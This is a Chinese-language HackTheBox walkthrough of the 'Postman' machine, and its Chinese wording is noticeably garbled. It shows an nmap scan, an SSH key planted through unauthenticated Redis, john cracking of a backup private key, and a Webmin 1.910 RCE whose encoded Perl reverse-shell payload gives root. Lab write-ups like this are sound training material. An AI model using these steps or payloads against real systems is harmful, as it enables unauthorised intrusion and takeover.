免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务探测

查看开明端口

┌──(root💀kali)-[~/htb/Postman]
└─# nmap -p- 10.10.10.160 --open
Starting Nmap 7.91 (https://nmap.org) at 2021-12-23 22:54 EST
Nmap scan report for 10.10.10.160
Host is up (0.31s latency).
Not shown: 64665 closed ports, 866 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

查看端口详细信息

┌──(root💀kali)-[~/htb/Postman]
└─# nmap -sV -T4 -A -O 10.10.10.160 -p 22,80,6379,10000
Starting Nmap 7.91 (https://nmap.org) at 2021-12-23 22:57 EST
Nmap scan report for 10.10.10.160
Host is up (0.26s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   251.42 ms 10.10.14.1
2   253.03 ms 10.10.10.160

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.24 seconds

先把靶机域名写进 host 文件

echo “10.10.10.160 Postman” >> /etc/hosts

能够看到开了 ssh 服务，一个 80 端口的 http 服务，6379 是 redis 服务，10000 端口是 webmin 服务

webmin 存在一个 rce 破绽，然而须要登录账号和明码。

┌──(root💀kali)-[~/htb/Postman]
└─# searchsploit webmin 1.910                                                                     130 ⨯
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit | linux/remote/46984.rb
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)         | linux/webapps/47330.rb
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

redis 4.0.9

redis 这个版本如同存在一个 rce，然而试了几个 exp 都报错

-ERR unknown command ‘system.exec’

搜寻了一圈，在这个帖子下看到一个答案

The redis instance doesn’t have MODULE command which is odd. If this is a CTF it might be intentional that the box creator removed it.

所以可能是被创建者人为移除了这个破绽

在 hacktricks 找到了一个通过批改 redis 的 ssh 配置文件，从而无明码登录靶机的办法，步骤如下：

1. cli 登录 redis

redis-cli -h 10.10.10.160

2. 应用 get dir 获取 redis 的装置目录

   ┌──(root💀kali)-[~/htb/Postman]
   └─# redis-cli -h 10.10.10.160
   10.10.10.160:6379> config get dir
   1) "dir"
   2) "/var/lib/redis"

当初咱们晓得 redis 装置在靶机的 /var/lib/redis 目录, 这一步次要是用于写 ssh 文件。

3. kali 端，把本地 id_rsa.pub 重定向到 key.txt，须要留神要空两行

(echo -e “\n\n”; cat /root/.ssh/id_rsa.pub; echo -e “\n\n”) > key.txt

4. 把攻击机公钥写进靶机的.ssh

cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

5. 再次登录靶机 redis，获取 ssh_key 值，胜利显示，示意曾经写入

   ┌──(root💀kali)-[~/htb/Postman]
   └─# redis-cli -h 10.10.10.160
   10.10.10.160:6379> GET ssh_key
   "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX....

6. 设置 redis 的 dir 目录

CONFIG SET dir /var/lib/redis/.ssh

7. 设置 dbfilename 为 authorized_keys

dbfilename authorized_keys

8. 保留

save

9. 退出 redis 终端，ssh 登录

   ┌──(root💀kali)-[~/htb/Postman]
   └─# ssh redis@10.10.10.160
   The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
   RSA key fingerprint is SHA256:FJdNat9qUrffCNDMV/0qF8efJdwa8NXW+iQ7NXuf/uk.
   Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
   Warning: Permanently added '10.10.10.160' (RSA) to the list of known hosts.
   Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
   
    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage
   
   
    * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
   Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
   redis@Postman:~$ id
   uid=107(redis) gid=114(redis) groups=114(redis)
   redis@Postman:~$ whoami
   redis
   

user.txt 在用户 matt 下，redis 账号没有权限

提权到 matt

传 linpeas，发现一个 id_rsa.bak 文件

╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak  

转成 john 能够辨认的款式

┌──(root💀kali)-[~/htb/Postman]
└─# /usr/share/john/ssh2john.py id_rsa >crask

john 破解

┌──(root💀kali)-[~/htb/Postman]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt crask
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021-12-25 01:04) 0.1290g/s 1850Kp/s 1850Kc/s 1850KC/sa6_123..*7¡Vamos!
Session completed

然而并不能间接登录

┌──(root💀kali)-[~/htb/Postman]
└─# ssh -i id_rsa matt@10.10.10.160                                                                                                                                                                                                                                                                                    130 ⨯
Enter passphrase for key 'id_rsa': 
Connection closed by 10.10.10.160 port 22

而后尝试用明码 computer2008 间接切换到 Matt，胜利了

redis@Postman:/opt$ su Matt
Password: 
Matt@Postman:/opt$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:/opt$ whoami
Matt

提权

webmin 1.910

webmin 是一个基于 web 界面的类 unix 治理平台，因为须要管理系统的诸多类容，所以经常都是以 root 权限运行。
后面咱们曾经晓得啊这个版本的 webmin 存在一个 rce，现在咱们又有了登录账号信息Matt:computer2008, 当初咱们能够利用这个 rce 提权

应用 github 上这个 RCE

先在 kali 开启一个监听

nc -lnvp 4242

执行攻打：

┌──(root💀kali)-[~/htb/Postman]
└─# python3 exploit_poc.py --ip_address=10.10.10.160 --port=10000 --lhost=10.10.14.3 --lport=4242 --user=Matt --pass=computer2008

Webmin 1.9101- 'Package updates' RCE

[+] Generating Payload...
[+] Reverse Payload Generated : u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4zOjQyNDIiKTtTVERJTi0%2BZmRvcGVuKCRjLHIpOyR%2BLT5mZG9wZW4oJGMsdyk7d2hpbGUoPD4pe2lmKCRfPX4gLyguKikvKXtzeXN0ZW0gJDE7fX07Jw%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22&ok_top=Update+Selected+Packages
[+] Attempting to login to Webmin
[+] Login Successful
[+] Attempting to Exploit

拿到反弹 shell

┌──(root💀kali)-[~/htb/Postman]
└─# nc -lnvp 4242                    
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.160] 36814
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

曾经胜利提权到 root